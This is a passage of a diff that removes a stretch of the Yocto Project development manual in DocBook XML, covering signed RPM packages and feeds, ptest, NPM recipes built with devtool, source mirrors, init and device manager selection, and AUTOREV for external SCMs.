-     deb http://my.server/deb/qemux86 ./
-                        </literallayout>
-                        Next, instruct the <filename>apt</filename>
-                        application to fetch the repository information:
-                        <literallayout class='monospaced'>
-     # apt-get update
-                        </literallayout>
-                        After this step, <filename>apt</filename> is able
-                        to find, install, and upgrade packages from the
-                        specified repository.
-                    </para>
-                </section>
-            </section>
-        </section>
-
-        <section id='generating-and-using-signed-packages'>
-            <title>Generating and Using Signed Packages</title>
-            <para>
-                In order to add security to RPM packages used during a build,
-                you can take steps to securely sign them.
-                Once a signature is verified, the OpenEmbedded build system
-                can use the package in the build.
-                If security fails for a signed package, the build system
-                aborts the build.
-            </para>
-
-            <para>
-                This section describes how to sign RPM packages during a build
-                and how to use signed package feeds (repositories) when
-                doing a build.
-            </para>
-
-            <section id='signing-rpm-packages'>
-                <title>Signing RPM Packages</title>
-
-                <para>
-                    To enable signing RPM packages, you must set up the
-                    following configurations in either your
-                    <filename>local.config</filename> or
-                    <filename>distro.config</filename> file:
-                    <literallayout class='monospaced'>
-     # Inherit sign_rpm.bbclass to enable signing functionality
-     INHERIT += " sign_rpm"
-     # Define the GPG key that will be used for signing.
-     RPM_GPG_NAME = "<replaceable>key_name</replaceable>"
-     # Provide passphrase for the key
-     RPM_GPG_PASSPHRASE = "<replaceable>passphrase</replaceable>"
-                    </literallayout>
-                    <note>
-                        Be sure to supply appropriate values for both
-                        <replaceable>key_name</replaceable> and
-                        <replaceable>passphrase</replaceable>
-                    </note>
-                    Aside from the
-                    <filename>RPM_GPG_NAME</filename> and
-                    <filename>RPM_GPG_PASSPHRASE</filename> variables in the
-                    previous example, two optional variables related to signing
-                    exist:
-                    <itemizedlist>
-                        <listitem><para>
-                            <emphasis><filename>GPG_BIN</filename>:</emphasis>
-                            Specifies a <filename>gpg</filename> binary/wrapper
-                            that is executed when the package is signed.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis><filename>GPG_PATH</filename>:</emphasis>
-                            Specifies the <filename>gpg</filename> home
-                            directory used when the package is signed.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-
-            <section id='processing-package-feeds'>
-                <title>Processing Package Feeds</title>
-
-                <para>
-                    In addition to being able to sign RPM packages, you can
-                    also enable signed package feeds for IPK and RPM packages.
-                </para>
-
-                <para>
-                    The steps you need to take to enable signed package feed
-                    use are similar to the steps used to sign RPM packages.
-                    You must define the following in your
-                    <filename>local.config</filename> or
-                    <filename>distro.config</filename> file:
-                    <literallayout class='monospaced'>
-     INHERIT += "sign_package_feed"
-     PACKAGE_FEED_GPG_NAME = "<replaceable>key_name</replaceable>"
-     PACKAGE_FEED_GPG_PASSPHRASE_FILE = "<replaceable>path_to_file_containing_passphrase</replaceable>"
-                    </literallayout>
-                    For signed package feeds, the passphrase must exist in a
-                    separate file, which is pointed to by the
-                    <filename>PACKAGE_FEED_GPG_PASSPHRASE_FILE</filename>
-                    variable.
-                    Regarding security, keeping a plain text passphrase out of
-                    the configuration is more secure.
-                </para>
-
-                <para>
-                    Aside from the
-                    <filename>PACKAGE_FEED_GPG_NAME</filename> and
-                    <filename>PACKAGE_FEED_GPG_PASSPHRASE_FILE</filename>
-                    variables, three optional variables related to signed
-                    package feeds exist:
-                    <itemizedlist>
-                        <listitem><para>
-                            <emphasis><filename>GPG_BIN</filename>:</emphasis>
-                            Specifies a <filename>gpg</filename> binary/wrapper
-                            that is executed when the package is signed.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis><filename>GPG_PATH</filename>:</emphasis>
-                            Specifies the <filename>gpg</filename> home
-                            directory used when the package is signed.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis><filename>PACKAGE_FEED_GPG_SIGNATURE_TYPE</filename>:</emphasis>
-                            Specifies the type of <filename>gpg</filename>
-                            signature.
-                            This variable applies only to RPM and IPK package
-                            feeds.
-                            Allowable values for the
-                            <filename>PACKAGE_FEED_GPG_SIGNATURE_TYPE</filename>
-                            are "ASC", which is the default and specifies ascii
-                            armored, and "BIN", which specifies binary.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-        </section>
-
-        <section id='testing-packages-with-ptest'>
-            <title>Testing Packages With ptest</title>
-
-            <para>
-                A Package Test (ptest) runs tests against packages built
-                by the OpenEmbedded build system on the target machine.
-                A ptest contains at least two items: the actual test, and
-                a shell script (<filename>run-ptest</filename>) that starts
-                the test.
-                The shell script that starts the test must not contain
-                the actual test - the script only starts the test.
-                On the other hand, the test can be anything from a simple
-                shell script that runs a binary and checks the output to
-                an elaborate system of test binaries and data files.
-            </para>
-
-            <para>
-                The test generates output in the format used by
-                Automake:
-                <literallayout class='monospaced'>
-     <replaceable>result</replaceable>: <replaceable>testname</replaceable>
-                </literallayout>
-                where the result can be <filename>PASS</filename>,
-                <filename>FAIL</filename>, or <filename>SKIP</filename>,
-                and the testname can be any identifying string.
-            </para>
-
-            <para>
-                For a list of Yocto Project recipes that are already
-                enabled with ptest, see the
-                <ulink url='https://wiki.yoctoproject.org/wiki/Ptest'>Ptest</ulink>
-                wiki page.
-                <note>
-                    A recipe is "ptest-enabled" if it inherits the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-ptest'><filename>ptest</filename></ulink>
-                    class.
-                </note>
-            </para>
-
-            <section id='adding-ptest-to-your-build'>
-                <title>Adding ptest to Your Build</title>
-
-                <para>
-                    To add package testing to your build, add the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></ulink>
-                    and <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_IMAGE_FEATURES'><filename>EXTRA_IMAGE_FEATURES</filename></ulink>
-                    variables to your <filename>local.conf</filename> file,
-                    which is found in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>:
-                    <literallayout class='monospaced'>
-     DISTRO_FEATURES_append = " ptest"
-     EXTRA_IMAGE_FEATURES += "ptest-pkgs"
-                    </literallayout>
-                    Once your build is complete, the ptest files are installed
-                    into the
-                    <filename>/usr/lib/<replaceable>package</replaceable>/ptest</filename>
-                    directory within the image, where
-                    <filename><replaceable>package</replaceable></filename>
-                    is the name of the package.
-                </para>
-            </section>
-
-            <section id='running-ptest'>
-                <title>Running ptest</title>
-
-                <para>
-                    The <filename>ptest-runner</filename> package installs a
-                    shell script that loops through all installed ptest test
-                    suites and runs them in sequence.
-                    Consequently, you might want to add this package to
-                    your image.
-                </para>
-            </section>
-
-            <section id='getting-your-package-ready'>
-                <title>Getting Your Package Ready</title>
-
-                <para>
-                    In order to enable a recipe to run installed ptests
-                    on target hardware,
-                    you need to prepare the recipes that build the packages
-                    you want to test.
-                    Here is what you have to do for each recipe:
-                    <itemizedlist>
-                        <listitem><para><emphasis>Be sure the recipe
-                            inherits the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-ptest'><filename>ptest</filename></ulink>
-                            class:</emphasis>
-                            Include the following line in each recipe:
-                            <literallayout class='monospaced'>
-     inherit ptest
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para><emphasis>Create <filename>run-ptest</filename>:</emphasis>
-                            This script starts your test.
-                            Locate the script where you will refer to it
-                            using
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>.
-                            Here is an example that starts a test for
-                            <filename>dbus</filename>:
-                            <literallayout class='monospaced'>
-     #!/bin/sh
-     cd test
-     make -k runtest-TESTS
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para><emphasis>Ensure dependencies are
-                            met:</emphasis>
-                            If the test adds build or runtime dependencies
-                            that normally do not exist for the package
-                            (such as requiring "make" to run the test suite),
-                            use the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
-                            and
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-RDEPENDS'><filename>RDEPENDS</filename></ulink>
-                            variables in your recipe in order for the package
-                            to meet the dependencies.
-                            Here is an example where the package has a runtime
-                            dependency on "make":
-                            <literallayout class='monospaced'>
-     RDEPENDS_${PN}-ptest += "make"
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para><emphasis>Add a function to build the
-                            test suite:</emphasis>
-                            Not many packages support cross-compilation of
-                            their test suites.
-                            Consequently, you usually need to add a
-                            cross-compilation function to the package.
-                            </para>
-
-                            <para>Many packages based on Automake compile and
-                            run the test suite by using a single command
-                            such as <filename>make check</filename>.
-                            However, the host <filename>make check</filename>
-                            builds and runs on the same computer, while
-                            cross-compiling requires that the package is built
-                            on the host but executed for the target
-                            architecture (though often, as in the case for
-                            ptest, the execution occurs on the host).
-                            The built version of Automake that ships with the
-                            Yocto Project includes a patch that separates
-                            building and execution.
-                            Consequently, packages that use the unaltered,
-                            patched version of <filename>make check</filename>
-                            automatically cross-compiles.</para>
-                            <para>Regardless, you still must add a
-                            <filename>do_compile_ptest</filename> function to
-                            build the test suite.
-                            Add a function similar to the following to your
-                            recipe:
-                            <literallayout class='monospaced'>
-     do_compile_ptest() {
-        oe_runmake buildtest-TESTS
-     }
-                            </literallayout>
-                            </para></listitem>
-                       <listitem><para><emphasis>Ensure special configurations
-                            are set:</emphasis>
-                            If the package requires special configurations
-                            prior to compiling the test code, you must
-                            insert a <filename>do_configure_ptest</filename>
-                            function into the recipe.
-                            </para></listitem>
-                       <listitem><para><emphasis>Install the test
-                            suite:</emphasis>
-                            The <filename>ptest</filename> class
-                            automatically copies the file
-                            <filename>run-ptest</filename> to the target and
-                            then runs make <filename>install-ptest</filename>
-                            to run the tests.
-                            If this is not enough, you need to create a
-                            <filename>do_install_ptest</filename> function and
-                            make sure it gets called after the
-                            "make install-ptest" completes.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-        </section>
-
-        <section id='creating-node-package-manager-npm-packages'>
-            <title>Creating Node Package Manager (NPM) Packages</title>
-
-            <para>
-                <ulink url='https://en.wikipedia.org/wiki/Npm_(software)'>NPM</ulink>
-                is a package manager for the JavaScript programming
-                language.
-                The Yocto Project supports the NPM
-                <ulink url='&YOCTO_DOCS_BB_URL;#bb-fetchers'>fetcher</ulink>.
-                You can use this fetcher in combination with
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-devtool-reference'><filename>devtool</filename></ulink>
-                to create recipes that produce NPM packages.
-            </para>
-
-            <para>
-                Two workflows exist that allow you to create NPM packages
-                using <filename>devtool</filename>: the NPM registry modules
-                method and the NPM project code method.
-                <note>
-                    While it is possible to create NPM recipes manually,
-                    using <filename>devtool</filename> is far simpler.
-                </note>
-                Additionally, some requirements and caveats exist.
-            </para>
-
-            <section id='npm-package-creation-requirements'>
-                <title>Requirements and Caveats</title>
-
-                <para>
-                    You need to be aware of the following before using
-                    <filename>devtool</filename> to create NPM packages:
-                    <itemizedlist>
-                        <listitem><para>
-                            Of the two methods that you can use
-                            <filename>devtool</filename> to create NPM
-                            packages, the registry approach is slightly
-                            simpler.
-                            However, you might consider the project
-                            approach because you do not have to publish
-                            your module in the NPM registry
-                            (<ulink url='https://docs.npmjs.com/misc/registry'><filename>npm-registry</filename></ulink>),
-                            which is NPM's public registry.
-                            </para></listitem>
-                        <listitem><para>
-                            Be familiar with
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-devtool-reference'><filename>devtool</filename></ulink>.
-                            </para></listitem>
-                        <listitem><para>
-                            The NPM host tools need the native
-                            <filename>nodejs-npm</filename> package, which
-                            is part of the OpenEmbedded environment.
-                            You need to get the package by cloning the
-                            <ulink url='https://github.com/openembedded/meta-openembedded'></ulink>
-                            repository out of GitHub.
-                            Be sure to add the path to your local copy to
-                            your <filename>bblayers.conf</filename> file.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>devtool</filename> cannot detect
-                            native libraries in module dependencies.
-                            Consequently, you must manually add packages
-                            to your recipe.
-                            </para></listitem>
-                        <listitem><para>
-                            While deploying NPM packages,
-                            <filename>devtool</filename> cannot determine
-                            which dependent packages are missing on the
-                            target (e.g. the node runtime
-                            <filename>nodejs</filename>).
-                            Consequently, you need to find out what
-                            files are missing and be sure they are on the
-                            target.
-                            </para></listitem>
-                        <listitem><para>
-                            Although you might not need NPM to run your
-                            node package, it is useful to have NPM on your
-                            target.
-                            The NPM package name is
-                            <filename>nodejs-npm</filename>.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-
-            <section id='npm-using-the-registry-modules-method'>
-                <title>Using the Registry Modules Method</title>
-
-                <para>
-                    This section presents an example that uses the
-                    <filename>cute-files</filename> module, which is a
-                    file browser web application.
-                    <note>
-                        You must know the <filename>cute-files</filename>
-                        module version.
-                    </note>
-                </para>
-
-                <para>
-                    The first thing you need to do is use
-                    <filename>devtool</filename> and the NPM fetcher to
-                    create the recipe:
-                    <literallayout class='monospaced'>
-     $ devtool add "npm://registry.npmjs.org;package=cute-files;version=1.0.2"
-                    </literallayout>
-                    The <filename>devtool add</filename> command runs
-                    <filename>recipetool create</filename> and uses the
-                    same fetch URI to download each dependency and capture
-                    license details where possible.
-                    The result is a generated recipe.
-                </para>
-
-                <para>
-                    The recipe file is fairly simple and contains every
-                    license that <filename>recipetool</filename> finds
-                    and includes the licenses in the recipe's
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-LIC_FILES_CHKSUM'><filename>LIC_FILES_CHKSUM</filename></ulink>
-                    variables.
-                    You need to examine the variables and look for those
-                    with "unknown" in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE'><filename>LICENSE</filename></ulink>
-                    field.
-                    You need to track down the license information for
-                    "unknown" modules and manually add the information to the
-                    recipe.
-                </para>
-
-                <para>
-                    <filename>recipetool</filename> creates a "shrinkwrap" file
-                    for your recipe.
-                    Shrinkwrap files capture the version of all dependent
-                    modules.
-                    Many packages do not provide shrinkwrap files.
-                    <filename>recipetool</filename> create a shrinkwrap
-                    file as it runs.
-                    <note>
-                        A package is created for each sub-module.
-                        This policy is the only practical way to have the
-                        licenses for all of the dependencies represented
-                        in the license manifest of the image.
-                    </note>
-                </para>
-
-                <para>
-                    The <filename>devtool edit-recipe</filename> command
-                    lets you take a look at the recipe:
-                    <literallayout class='monospaced'>
-     $ devtool edit-recipe cute-files
-     SUMMARY = "Turn any folder on your computer into a cute file browser, available on the local network."
-     LICENSE = "MIT &amp; ISC &amp; Unknown"
-     LIC_FILES_CHKSUM = "file://LICENSE;md5=71d98c0a1db42956787b1909c74a86ca \
-                         file://node_modules/toidentifier/LICENSE;md5=1a261071a044d02eb6f2bb47f51a3502 \
-                         file://node_modules/debug/LICENSE;md5=ddd815a475e7338b0be7a14d8ee35a99 \
-                         ...
-
-     SRC_URI = " \
-         npm://registry.npmjs.org/;package=cute-files;version=${PV} \
-         npmsw://${THISDIR}/${BPN}/npm-shrinkwrap.json \
-     "
-
-     S = "${WORKDIR}/npm"
-
-     inherit npm
-
-     LICENSE_${PN} = "MIT"
-     LICENSE_${PN}-accepts = "MIT"
-     LICENSE_${PN}-array-flatten = "MIT"
-     ...
-     LICENSE_${PN}-vary = "MIT"
-                    </literallayout>
-                    Three key points exist in the previous example:
-                    <itemizedlist>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                            uses the NPM scheme so that the NPM fetcher
-                            is used.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>recipetool</filename> collects all
-                            the license information.
-                            If a sub-module's license is unavailable,
-                            the sub-module's name appears in the comments.
-                            </para></listitem>
-                        <listitem><para>
-                            The <filename>inherit npm</filename> statement
-                            causes the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-npm'><filename>npm</filename></ulink>
-                            class to package up all the modules.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-
-                <para>
-                    You can run the following command to build the
-                    <filename>cute-files</filename> package:
-                    <literallayout class='monospaced'>
-     $ devtool build cute-files
-                    </literallayout>
-                    Remember that <filename>nodejs</filename> must be
-                    installed on the target before your package.
-                </para>
-
-                <para>
-                    Assuming 192.168.7.2 for the target's IP address, use
-                    the following command to deploy your package:
-                    <literallayout class='monospaced'>
-     $ devtool deploy-target -s cute-files root@192.168.7.2
-                    </literallayout>
-                    Once the package is installed on the target, you can
-                    test the application:
-                    <note>
-                        Because of a know issue, you cannot simply run
-                        <filename>cute-files</filename> as you would if you
-                        had run <filename>npm install</filename>.
-                    </note>
-                    <literallayout class='monospaced'>
-     $ cd /usr/lib/node_modules/cute-files
-     $ node cute-files.js
-                    </literallayout>
-                    On a browser, go to
-                    <filename>http://192.168.7.2:3000</filename> and you
-                    see the following:
-                    <imagedata fileref="figures/cute-files-npm-example.png" align="center" width="6in" depth="4in" />
-                </para>
-
-                <para>
-                    You can find the recipe in
-                    <filename>workspace/recipes/cute-files</filename>.
-                    You can use the recipe in any layer you choose.
-                </para>
-            </section>
-
-            <section id='npm-using-the-npm-projects-method'>
-                <title>Using the NPM Projects Code Method</title>
-
-                <para>
-                    Although it is useful to package modules already in the
-                    NPM registry, adding <filename>node.js</filename> projects
-                    under development is a more common developer use case.
-                </para>
-
-                <para>
-                    This section covers the NPM projects code method, which is
-                    very similar to the "registry" approach described in the
-                    previous section.
-                    In the NPM projects method, you provide
-                    <filename>devtool</filename> with an URL that points to the
-                    source files.
-                </para>
-
-                <para>
-                    Replicating the same example, (i.e.
-                    <filename>cute-files</filename>) use the following command:
-                    <literallayout class='monospaced'>
-     $ devtool add https://github.com/martinaglv/cute-files.git
-                    </literallayout>
-                    The recipe this command generates is very similar to the
-                    recipe created in the previous section.
-                    However, the <filename>SRC_URI</filename> looks like the
-                    following:
-                    <literallayout class='monospaced'>
-     SRC_URI = " \
-         git://github.com/martinaglv/cute-files.git;protocol=https \
-         npmsw://${THISDIR}/${BPN}/npm-shrinkwrap.json \
-         "
-                    </literallayout>
-                    In this example, the main module is taken from the Git
-                    repository and dependents are taken from the NPM registry.
-                    Other than those differences, the recipe is basically the
-                    same between the two methods.
-                    You can build and deploy the package exactly as described
-                    in the previous section that uses the registry modules
-                    method.
-                </para>
-            </section>
-        </section>
-    </section>
-
-    <section id='efficiently-fetching-source-files-during-a-build'>
-        <title>Efficiently Fetching Source Files During a Build</title>
-
-        <para>
-            The OpenEmbedded build system works with source files located
-            through the
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-            variable.
-            When you build something using BitBake, a big part of the operation
-            is locating and downloading all the source tarballs.
-            For images, downloading all the source for various packages can
-            take a significant amount of time.
-        </para>
-
-        <para>
-            This section shows you how you can use mirrors to speed up
-            fetching source files and how you can pre-fetch files all of which
-            leads to more efficient use of resources and time.
-        </para>
-
-        <section id='setting-up-effective-mirrors'>
-            <title>Setting up Effective Mirrors</title>
-
-            <para>
-                A good deal that goes into a Yocto Project
-                build is simply downloading all of the source tarballs.
-                Maybe you have been working with another build system
-                (OpenEmbedded or Angstrom) for which you have built up a
-                sizable directory of source tarballs.
-                Or, perhaps someone else has such a directory for which you
-                have read access.
-                If so, you can save time by adding statements to your
-                configuration file so that the build process checks local
-                directories first for existing tarballs before checking the
-                Internet.
-            </para>
-
-            <para>
-                Here is an efficient way to set it up in your
-                <filename>local.conf</filename> file:
-                <literallayout class='monospaced'>
-     SOURCE_MIRROR_URL ?= "file:///home/you/your-download-dir/"
-     INHERIT += "own-mirrors"
-     BB_GENERATE_MIRROR_TARBALLS = "1"
-     # BB_NO_NETWORK = "1"
-                </literallayout>
-            </para>
-
-            <para>
-                In the previous example, the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-BB_GENERATE_MIRROR_TARBALLS'><filename>BB_GENERATE_MIRROR_TARBALLS</filename></ulink>
-                variable causes the OpenEmbedded build system to generate
-                tarballs of the Git repositories and store them in the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-DL_DIR'><filename>DL_DIR</filename></ulink>
-                directory.
-                Due to performance reasons, generating and storing these
-                tarballs is not the build system's default behavior.
-            </para>
-
-            <para>
-                You can also use the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PREMIRRORS'><filename>PREMIRRORS</filename></ulink>
-                variable.
-                For an example, see the variable's glossary entry in the
-                Yocto Project Reference Manual.
-            </para>
-        </section>
-
-        <section id='getting-source-files-and-suppressing-the-build'>
-            <title>Getting Source Files and Suppressing the Build</title>
-
-            <para>
-                Another technique you can use to ready yourself for a
-                successive string of build operations, is to pre-fetch
-                all the source files without actually starting a build.
-                This technique lets you work through any download issues
-                and ultimately gathers all the source files into your
-                download directory
-                <ulink url='&YOCTO_DOCS_REF_URL;#structure-build-downloads'><filename>build/downloads</filename></ulink>,
-                which is located with
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-DL_DIR'><filename>DL_DIR</filename></ulink>.
-            </para>
-
-            <para>
-                Use the following BitBake command form to fetch all the
-                necessary sources without starting the build:
-                <literallayout class='monospaced'>
-     $ bitbake <replaceable>target</replaceable> --runall=fetch
-                </literallayout>
-                This variation of the BitBake command guarantees that you
-                have all the sources for that BitBake target should you
-                disconnect from the Internet and want to do the build
-                later offline.
-            </para>
-        </section>
-    </section>
-
-    <section id="selecting-an-initialization-manager">
-        <title>Selecting an Initialization Manager</title>
-
-        <para>
-            By default, the Yocto Project uses SysVinit as the initialization
-            manager.
-            However, support also exists for systemd,
-            which is a full replacement for init with
-            parallel starting of services, reduced shell overhead and other
-            features that are used by many distributions.
-        </para>
-
-        <para>
-            Within the system, SysVinit treats system components as services.
-            These services are maintained as shell scripts stored in the
-            <filename>/etc/init.d/</filename> directory.
-            Services organize into different run levels.
-            This organization is maintained by putting links to the services
-            in the <filename>/etc/rcN.d/</filename> directories, where
-            <replaceable>N/</replaceable> is one of the following options:
-            "S", "0", "1", "2", "3", "4", "5", or "6".
-            <note>
-                Each runlevel has a dependency on the previous runlevel.
-                This dependency allows the services to work properly.
-            </note>
-        </para>
-
-        <para>
-            In comparison, systemd treats components as units.
-            Using units is a broader concept as compared to using a service.
-            A unit includes several different types of entities.
-            Service is one of the types of entities.
-            The runlevel concept in SysVinit corresponds to the concept of a
-            target in systemd, where target is also a type of supported unit.
-        </para>
-
-        <para>
-            In a SysVinit-based system, services load sequentially (i.e. one
-            by one) during and parallelization is not supported.
-            With systemd, services start in parallel.
-            Needless to say, the method can have an impact on system startup
-            performance.
-        </para>
-
-        <para>
-            If you want to use SysVinit, you do
-            not have to do anything.
-            But, if you want to use systemd, you must
-            take some steps as described in the following sections.
-        </para>
-
-        <section id='using-systemd-exclusively'>
-            <title>Using systemd Exclusively</title>
-
-            <para>
-                Set these variables in your distribution configuration
-                file as follows:
-                <literallayout class='monospaced'>
-     DISTRO_FEATURES_append = " systemd"
-     VIRTUAL-RUNTIME_init_manager = "systemd"
-                </literallayout>
-                You can also prevent the SysVinit
-                distribution feature from
-                being automatically enabled as follows:
-                <literallayout class='monospaced'>
-     DISTRO_FEATURES_BACKFILL_CONSIDERED = "sysvinit"
-                </literallayout>
-                Doing so removes any redundant SysVinit scripts.
-            </para>
-
-            <para>
-                To remove  initscripts from your image altogether,
-                set this variable also:
-                <literallayout class='monospaced'>
-     VIRTUAL-RUNTIME_initscripts = ""
-                </literallayout>
-            </para>
-
-            <para>
-                For information on the backfill variable, see
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES_BACKFILL_CONSIDERED'><filename>DISTRO_FEATURES_BACKFILL_CONSIDERED</filename></ulink>.
-            </para>
-        </section>
-
-        <section id='using-systemd-for-the-main-image-and-using-sysvinit-for-the-rescue-image'>
-            <title>Using systemd for the Main Image and Using SysVinit for the Rescue Image</title>
-
-            <para>
-                Set these variables in your distribution configuration
-                file as follows:
-                <literallayout class='monospaced'>
-     DISTRO_FEATURES_append = " systemd"
-     VIRTUAL-RUNTIME_init_manager = "systemd"
-                </literallayout>
-                Doing so causes your main image to use the
-                <filename>packagegroup-core-boot.bb</filename> recipe and
-                systemd.
-                The rescue/minimal image cannot use this package group.
-                However, it can install SysVinit
-                and the appropriate packages will have support for both
-                systemd and SysVinit.
-            </para>
-        </section>
-    </section>
-
-    <section id="selecting-dev-manager">
-        <title>Selecting a Device Manager</title>
-
-        <para>
-            The Yocto Project provides multiple ways to manage the device
-            manager (<filename>/dev</filename>):
-            <itemizedlist>
-                <listitem><para><emphasis>Persistent and Pre-Populated<filename>/dev</filename>:</emphasis>
-                    For this case, the <filename>/dev</filename> directory
-                    is persistent and the required device nodes are created
-                    during the build.
-                    </para></listitem>
-                <listitem><para><emphasis>Use <filename>devtmpfs</filename> with a Device Manager:</emphasis>
-                    For this case, the <filename>/dev</filename> directory
-                    is provided by the kernel as an in-memory file system and
-                    is automatically populated by the kernel at runtime.
-                    Additional configuration of device nodes is done in user
-                    space by a device manager like
-                    <filename>udev</filename> or
-                    <filename>busybox-mdev</filename>.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <section id="static-dev-management">
-            <title>Using Persistent and Pre-Populated<filename>/dev</filename></title>
-
-            <para>
-                To use the static method for device population, you need to
-                set the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-USE_DEVFS'><filename>USE_DEVFS</filename></ulink>
-                variable to "0" as follows:
-                <literallayout class='monospaced'>
-     USE_DEVFS = "0"
-                </literallayout>
-            </para>
-
-            <para>
-                The content of the resulting <filename>/dev</filename>
-                directory is defined in a Device Table file.
-                The
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_DEVICE_TABLES'><filename>IMAGE_DEVICE_TABLES</filename></ulink>
-                variable defines the Device Table to use and should be set
-                in the machine or distro configuration file.
-                Alternatively, you can set this variable in your
-                <filename>local.conf</filename> configuration file.
-            </para>
-
-            <para>
-                If you do not define the
-                <filename>IMAGE_DEVICE_TABLES</filename> variable, the default
-                <filename>device_table-minimal.txt</filename> is used:
-                <literallayout class='monospaced'>
-     IMAGE_DEVICE_TABLES = "device_table-mymachine.txt"
-                </literallayout>
-            </para>
-
-            <para>
-                The population is handled by the <filename>makedevs</filename>
-                utility during image creation:
-            </para>
-        </section>
-
-        <section id="devtmpfs-dev-management">
-            <title>Using <filename>devtmpfs</filename> and a Device Manager</title>
-
-            <para>
-                To use the dynamic method for device population, you need to
-                use (or be sure to set) the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-USE_DEVFS'><filename>USE_DEVFS</filename></ulink>
-                variable to "1", which is the default:
-                <literallayout class='monospaced'>
-     USE_DEVFS = "1"
-                </literallayout>
-                With this setting, the resulting <filename>/dev</filename>
-                directory is populated by the kernel using
-                <filename>devtmpfs</filename>.
-                Make sure the corresponding kernel configuration variable
-                <filename>CONFIG_DEVTMPFS</filename> is set when building
-                you build a Linux kernel.
-            </para>
-
-            <para>
-                All devices created by <filename>devtmpfs</filename> will be
-                owned by <filename>root</filename> and have permissions
-                <filename>0600</filename>.
-            </para>
-
-            <para>
-                To have more control over the device nodes, you can use a
-                device manager like <filename>udev</filename> or
-                <filename>busybox-mdev</filename>.
-                You choose the device manager by defining the
-                <filename>VIRTUAL-RUNTIME_dev_manager</filename> variable
-                in your machine or distro configuration file.
-                Alternatively, you can set this variable in your
-                <filename>local.conf</filename> configuration file:
-                <literallayout class='monospaced'>
-     VIRTUAL-RUNTIME_dev_manager = "udev"
-
-     # Some alternative values
-     # VIRTUAL-RUNTIME_dev_manager = "busybox-mdev"
-     # VIRTUAL-RUNTIME_dev_manager = "systemd"
-                </literallayout>
-            </para>
-        </section>
-    </section>
-
-    <section id="platdev-appdev-srcrev">
-        <title>Using an External SCM</title>
-
-        <para>
-            If you're working on a recipe that pulls from an external Source
-            Code Manager (SCM), it is possible to have the OpenEmbedded build
-            system notice new recipe changes added to the SCM and then build
-            the resulting packages that depend on the new recipes by using
-            the latest versions.
-            This only works for SCMs from which it is possible to get a
-            sensible revision number for changes.
-            Currently, you can do this with Apache Subversion (SVN), Git, and
-            Bazaar (BZR) repositories.
-        </para>
-
-        <para>
-            To enable this behavior, the
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>
-            of the recipe needs to reference
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCPV'><filename>SRCPV</filename></ulink>.
-            Here is an example:
-            <literallayout class='monospaced'>
-     PV = "1.2.3+git${SRCPV}"
-            </literallayout>
-            Then, you can add the following to your
-            <filename>local.conf</filename>:
-            <literallayout class='monospaced'>
-     SRCREV_pn-<replaceable>PN</replaceable> = "${AUTOREV}"
-            </literallayout>
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink>
-            is the name of the recipe for which you want to enable automatic source
-            revision updating.
-        </para>
-
-        <para>
-            If you do not want to update your local configuration file, you can
-            add the following directly to the recipe to finish enabling
-            the feature:
-            <literallayout class='monospaced'>
-     SRCREV = "${AUTOREV}"
-            </literallayout>
-        </para>
-
-        <para>
-            The Yocto Project provides a distribution named
-            <filename>poky-bleeding</filename>, whose configuration
-            file contains the line:
-            <literallayout class='monospaced'>
-     require conf/distro/include/poky-floating-revisions.inc
-            </literallayout>
-            This line pulls in the listed include file that contains
-            numerous lines of exactly that form:
-            <literallayout class='monospaced'>
-     #SRCREV_pn-opkg-native ?= "${AUTOREV}"
-     #SRCREV_pn-opkg-sdk ?= "${AUTOREV}"
-     #SRCREV_pn-opkg ?= "${AUTOREV}"
-     #SRCREV_pn-opkg-utils-native ?= "${AUTOREV}"
-     #SRCREV_pn-opkg-utils ?= "${AUTOREV}"
-     SRCREV_pn-gconf-dbus ?= "${AUTOREV}"
-     SRCREV_pn-matchbox-common ?= "${AUTOREV}"
-     SRCREV_pn-matchbox-config-gtk ?= "${AUTOREV}"
